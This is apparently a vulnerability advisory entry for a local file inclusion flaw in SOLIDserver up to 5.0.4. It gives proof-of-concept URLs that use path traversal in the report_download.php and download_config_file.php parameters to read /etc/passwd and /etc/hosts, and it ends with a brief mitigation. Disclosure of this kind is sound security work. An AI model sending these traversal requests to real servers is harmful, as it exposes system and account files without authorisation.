vendor:
SOLIDserver
by:
Saeed reza Zamanian
N/A
CVSS
N/A
Local File Inclusion
22
CWE
Product Name: SOLIDserver
Affected Version From: 4.0.2
Affected Version To: 5.0.4
Patch Exists: YES
Related CWE: None
CPE: efficientip:solidserver
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2016
SOLIDserver <=5.0.4 - Local File Inclusion Vunerability
Based on a code review done on the product, this product doesn't have any observation on some parameters, that make the attacker able to read file contents. PoC 1: https://www.site.com/mod/system/report_download.php?report_filename=/etc/passwd or view-source:https://www.site.com/mod/system/report_download.php?report_filename=../../../../../../../../../../../../etc/passwd PoC 2: [login authentication required] https://www.site.com/mod/generic/download_config_file.php?config_file=../../../../../../../../../../../../../../etc/hosts
Mitigation:
Ensure that user input is properly sanitized and validated before being used in file operations.